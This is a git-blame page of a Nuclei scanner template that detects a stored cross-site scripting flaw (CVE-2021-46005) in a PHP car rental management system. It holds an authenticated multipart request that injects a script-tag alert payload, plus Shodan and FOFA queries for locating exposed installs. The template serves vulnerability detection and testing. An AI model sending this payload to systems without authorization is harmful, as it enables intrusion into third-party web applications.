daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2021/CVE-2021-46005.yaml

125 lines
4.3 KiB
YAML
Raw Permalink Normal View History

add CVE-2021-46005
2022-01-29 13:22:44 +00:00
id: CVE-2021-46005
info:
Enhancement: cves/2021/CVE-2021-46005.yaml by mp
2022-02-28 20:07:15 +00:00
name: Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting
add CVE-2021-46005
2022-01-29 13:22:44 +00:00
author: cckuailong
severity: medium
Enhancement: cves/2021/CVE-2021-46005.yaml by mp
2022-02-28 20:07:15 +00:00
description: Sourcecodester Car Rental Management System 1.0 is vulnerable to cross-site scripting via the vehicalorcview parameter.
Added Impact
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to the execution of arbitrary code or theft of sensitive information.
Updated 2021 CVEs
2023-09-06 12:09:01 +00:00
remediation: |
To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
add CVE-2021-46005
2022-01-29 13:22:44 +00:00
reference:
- https://www.exploit-db.com/exploits/49546
- https://nvd.nist.gov/vuln/detail/CVE-2021-46005
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com>
2022-05-17 09:18:12 +00:00
- https://www.sourcecodester.com/cc/14145/online-car-rental-system-using-phpmysql.html
product/queries updated
2024-05-31 19:23:20 +00:00
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
add CVE-2021-46005
2022-01-29 13:22:44 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2021-46005
cwe-id: CWE-79
Added EPSS Percentile
2023-08-31 11:46:18 +00:00
epss-score: 0.00143
product/queries updated
2024-05-31 19:23:20 +00:00
epss-percentile: 0.50094
Updated 2021 CVEs
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*
Added max request counter of each template
2023-04-28 08:11:21 +00:00
metadata:
max-request: 3
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
vendor: car_rental_management_system_project
product: car_rental_management_system
product/queries updated
2024-05-31 19:23:20 +00:00
shodan-query: http.html:"car rental management system"
fofa-query: body="car rental management system"
auto tagging via templateman
2024-01-14 09:21:50 +00:00
tags: cve2021,cve,sourcecodester,authenticated,edb,xss,intrusive,car_rental_management_system_project
add CVE-2021-46005
2022-01-29 13:22:44 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>
2023-04-27 04:28:59 +00:00
http:
add CVE-2021-46005
2022-01-29 13:22:44 +00:00
- raw:
- |
POST /admin/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Connection: close
username={{username}}&password={{password}}&login=
- |
POST /admin/post-avehical.php HTTP/1.1
Host: {{Hostname}}
Update CVE-2021-46005.yaml
2022-01-31 17:59:36 +00:00
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypWqYipqU21aYgccv
add CVE-2021-46005
2022-01-29 13:22:44 +00:00
Update CVE-2021-46005.yaml
2022-01-31 17:59:36 +00:00
------WebKitFormBoundarypWqYipqU21aYgccv
add CVE-2021-46005
2022-01-29 13:22:44 +00:00
Content-Disposition: form-data; name="vehicletitle"
Update CVE-2021-46005.yaml
2022-01-31 17:59:36 +00:00
Test
------WebKitFormBoundarypWqYipqU21aYgccv
add CVE-2021-46005
2022-01-29 13:22:44 +00:00
Content-Disposition: form-data; name="brandname"
Update CVE-2021-46005.yaml
2022-01-31 17:59:36 +00:00
1
------WebKitFormBoundarypWqYipqU21aYgccv
add CVE-2021-46005
2022-01-29 13:22:44 +00:00
Content-Disposition: form-data; name="vehicalorcview"
Update CVE-2021-46005.yaml
2022-01-31 17:59:36 +00:00
</script><script>alert(document.domain)</script>
------WebKitFormBoundarypWqYipqU21aYgccv
add CVE-2021-46005
2022-01-29 13:22:44 +00:00
Content-Disposition: form-data; name="priceperday"
Update CVE-2021-46005.yaml
2022-01-31 17:59:36 +00:00
500
------WebKitFormBoundarypWqYipqU21aYgccv
add CVE-2021-46005
2022-01-29 13:22:44 +00:00
Content-Disposition: form-data; name="fueltype"
Update CVE-2021-46005.yaml
2022-01-31 17:59:36 +00:00
Petrol
------WebKitFormBoundarypWqYipqU21aYgccv
add CVE-2021-46005
2022-01-29 13:22:44 +00:00
Content-Disposition: form-data; name="modelyear"
Update CVE-2021-46005.yaml
2022-01-31 17:59:36 +00:00
2022
------WebKitFormBoundarypWqYipqU21aYgccv
add CVE-2021-46005
2022-01-29 13:22:44 +00:00
Content-Disposition: form-data; name="seatingcapacity"
Update CVE-2021-46005.yaml
2022-01-31 17:59:36 +00:00
5
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="img1"; filename="test.png"
add CVE-2021-46005
2022-01-29 13:22:44 +00:00
Content-Type: image/png
Update CVE-2021-46005.yaml
2022-01-31 17:59:36 +00:00
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="img2"; filename="test.png"
Content-Type: image/png
add CVE-2021-46005
2022-01-29 13:22:44 +00:00
Update CVE-2021-46005.yaml
2022-01-31 17:59:36 +00:00
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="img3"; filename="test.png"
Content-Type: image/png
add CVE-2021-46005
2022-01-29 13:22:44 +00:00
Update CVE-2021-46005.yaml
2022-01-31 17:59:36 +00:00
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="img4"; filename="test.png"
Content-Type: image/png
add CVE-2021-46005
2022-01-29 13:22:44 +00:00
Update CVE-2021-46005.yaml
2022-01-31 17:59:36 +00:00
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="img5"; filename=""
Content-Type: application/octet-stream
add CVE-2021-46005
2022-01-29 13:22:44 +00:00
Update CVE-2021-46005.yaml
2022-01-31 17:59:36 +00:00
------WebKitFormBoundarypWqYipqU21aYgccv
add CVE-2021-46005
2022-01-29 13:22:44 +00:00
Content-Disposition: form-data; name="submit"
Update CVE-2021-46005.yaml
2022-01-31 17:59:36 +00:00
------WebKitFormBoundarypWqYipqU21aYgccv--
add CVE-2021-46005
2022-01-29 13:22:44 +00:00
- |
GET / HTTP/1.1
Host: {{Hostname}}
Update CVE-2021-46005.yaml
2022-01-31 18:04:34 +00:00
add CVE-2021-46005
2022-01-29 13:22:44 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
- </script><script>alert(document.domain)</script>
Update CVE-2021-46005.yaml
2022-01-31 17:59:36 +00:00
- type: word
part: header
words:
- text/html
removing trailing spaces
2022-01-29 13:54:58 +00:00
add CVE-2021-46005
2022-01-29 13:22:44 +00:00
- type: status
status:
- 200
Auto Template Signing [Sat Jun 1 06:52:59 UTC 2024] :robot:
2024-06-01 06:53:00 +00:00
# digest: 490a00463044022047d63f5826c9b9ceb59d9ed3139a6b530fae5726bf1418cdbe4decff91e8d22202201acab11fdc62c4bfed133b124241b997797189b54ce0170b7bc726d75cfd3b2c:922c64590222798bb761d5b6d8e72950